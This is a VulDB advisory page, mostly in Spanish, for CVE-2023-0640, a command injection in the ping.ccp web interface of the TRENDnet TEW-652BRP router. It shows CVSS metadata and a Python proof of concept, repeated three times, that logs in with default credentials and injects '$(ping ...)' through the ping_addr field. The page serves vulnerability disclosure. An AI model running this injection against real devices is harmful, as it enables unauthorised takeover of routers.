TRENDnet TEW-652BRP 3.04b01 Web Interface ping.ccp escalada de privilegios

Una vulnerabilidad clasificada como crítica ha sido encontrada en TRENDnet TEW-652BRP 3.04b01. Una función desconocida del archivo ping.ccp del componente Web Interface es afectada por esta vulnerabilidad. A través de la manipulación de un input desconocido se causa una vulnerabilidad de clase escalada de privilegios. La vulnerabilidad es identificada como CVE-2023-0640. El ataque puede ser iniciado desde la red. Los detalles técnicos son conocidos. Fue declarado como proof-of-concept. El exploit puede ser descargado de vuldb.com. Una solución posible ha sido publicada antes y no simplemente después de la publicación de la vulnerabilidad.

Campo	2023-02-02 09:19	2023-03-01 17:01	2023-03-01 17:07
vendor	TRENDnet	TRENDnet	TRENDnet
name	TEW-652BRP	TEW-652BRP	TEW-652BRP
version	3.04b01	3.04b01	3.04b01
component	Web Interface	Web Interface	Web Interface
file	ping.ccp	ping.ccp	ping.ccp
cwe	77 (escalada de privilegios)	77 (escalada de privilegios)	77 (escalada de privilegios)
risk	2	2	2
cvss3_vuldb_av	N	N	N
cvss3_vuldb_ac	L	L	L
cvss3_vuldb_pr	H	H	H
cvss3_vuldb_ui	N	N	N
cvss3_vuldb_s	U	U	U
cvss3_vuldb_c	H	H	H
cvss3_vuldb_i	H	H	H
cvss3_vuldb_a	H	H	H
cvss3_vuldb_e	P	P	P
cvss3_vuldb_rc	R	R	R
availability	1	1	1
publicity	1	1	1
cve	CVE-2023-0640	CVE-2023-0640	CVE-2023-0640
responsible	VulDB	VulDB	VulDB
date	1675292400 (2023-02-02)	1675292400 (2023-02-02)	1675292400 (2023-02-02)
cvss2_vuldb_av	N	N	N
cvss2_vuldb_ac	L	L	L
cvss2_vuldb_au	M	M	M
cvss2_vuldb_ci	C	C	C
cvss2_vuldb_ii	C	C	C
cvss2_vuldb_ai	C	C	C
cvss2_vuldb_e	POC	POC	POC
cvss2_vuldb_rc	UR	UR	UR
cvss2_vuldb_rl	ND	ND	ND
cvss3_vuldb_rl	X	X	X
cvss2_vuldb_basescore	8.3	8.3	8.3
cvss2_vuldb_tempscore	7.1	7.1	7.1
cvss3_vuldb_basescore	7.2	7.2	7.2
cvss3_vuldb_tempscore	6.5	6.5	6.5
cvss3_meta_basescore	7.2	7.2	8.1
cvss3_meta_tempscore	6.5	6.5	7.8
price_0day	$0-$5k	$0-$5k	$0-$5k
language	Python	Python	Python
sourcecode	import requests,socket import re import time from urllib.parse import urlencode username = 'admin' password = 'admin' device_web_ip = '192.168.10.1' ping_target_ip = '192.168.10.2' headers = {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://{}'.format(device_web_ip), 'Connection': 'keep-alive', 'Referer': 'http://{}/ping_test.htm'.format(device_web_ip), 'Upgrade-Insecure-Requests': '1'} login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password) login_url = 'http://{}/login.ccp'.format(device_web_ip) r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2) if r is None or r.status_code != 200: print('Login wrong, please retry!') exit() params = { 'ccp_act': 'ping_v4', 'nextPage': 'ping_back.htm', 'html_response_page': 'ping_back.htm', 'html_response_message': 'The+setting+is+saved.', 'html_response_return_page': 'ping_test.htm', 'ping_addr': 'abcd"$(ping -c 1 {})"'.format(ping_target_ip), 'ping': 'Ping', 'deviceList': '', '/friendlyName': '' } method = 'POST' url = 'http://{}/ping.ccp'.format(device_web_ip) try: r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2) r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2) except: pass	import requests,socket import re import time from urllib.parse import urlencode username = 'admin' password = 'admin' device_web_ip = '192.168.10.1' ping_target_ip = '192.168.10.2' headers = {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://{}'.format(device_web_ip), 'Connection': 'keep-alive', 'Referer': 'http://{}/ping_test.htm'.format(device_web_ip), 'Upgrade-Insecure-Requests': '1'} login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password) login_url = 'http://{}/login.ccp'.format(device_web_ip) r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2) if r is None or r.status_code != 200: print('Login wrong, please retry!') exit() params = { 'ccp_act': 'ping_v4', 'nextPage': 'ping_back.htm', 'html_response_page': 'ping_back.htm', 'html_response_message': 'The+setting+is+saved.', 'html_response_return_page': 'ping_test.htm', 'ping_addr': 'abcd"$(ping -c 1 {})"'.format(ping_target_ip), 'ping': 'Ping', 'deviceList': '', '/friendlyName': '' } method = 'POST' url = 'http://{}/ping.ccp'.format(device_web_ip) try: r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2) r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2) except: pass	import requests,socket import re import time from urllib.parse import urlencode username = 'admin' password = 'admin' device_web_ip = '192.168.10.1' ping_target_ip = '192.168.10.2' headers = {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://{}'.format(device_web_ip), 'Connection': 'keep-alive', 'Referer': 'http://{}/ping_test.htm'.format(device_web_ip), 'Upgrade-Insecure-Requests': '1'} login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password) login_url = 'http://{}/login.ccp'.format(device_web_ip) r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2) if r is None or r.status_code != 200: print('Login wrong, please retry!') exit() params = { 'ccp_act': 'ping_v4', 'nextPage': 'ping_back.htm', 'html_response_page': 'ping_back.htm', 'html_response_message': 'The+setting+is+saved.', 'html_response_return_page': 'ping_test.htm', 'ping_addr': 'abcd"$(ping -c 1 {})"'.format(ping_target_ip), 'ping': 'Ping', 'deviceList': '', '/friendlyName': '' } method = 'POST' url = 'http://{}/ping.ccp'.format(device_web_ip) try: r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2) r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2) except: pass
cve_assigned		1675292400 (2023-02-02)	1675292400 (2023-02-02)
cve_nvd_summary		A vulnerability was found in TRENDnet TEW-652BRP 3.04b01. It has been classified as critical. Affected is an unknown function of the file ping.ccp of the component Web Interface. The manipulation leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220020.	A vulnerability was found in TRENDnet TEW-652BRP 3.04b01. It has been classified as critical. Affected is an unknown function of the file ping.ccp of the component Web Interface. The manipulation leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220020.
cvss3_nvd_av			N
cvss3_nvd_ac			L
cvss3_nvd_pr			N
cvss3_nvd_ui			N
cvss3_nvd_s			U
cvss3_nvd_c			H
cvss3_nvd_i			H
cvss3_nvd_a			H
cvss2_nvd_av			N
cvss2_nvd_ac			L
cvss2_nvd_au			M
cvss2_nvd_ci			C
cvss2_nvd_ii			C
cvss2_nvd_ai			C
cvss3_cna_av			N
cvss3_cna_ac			L
cvss3_cna_pr			H
cvss3_cna_ui			N
cvss3_cna_s			U
cvss3_cna_c			H
cvss3_cna_i			H
cvss3_cna_a			H
cve_cna			VulDB
cvss2_nvd_basescore			8.3
cvss3_nvd_basescore			9.8
cvss3_cna_basescore			7.2

◂ Anterior Visión De Conjunto Próximo ▸

Interested in the pricing of exploits?

See the underground prices here!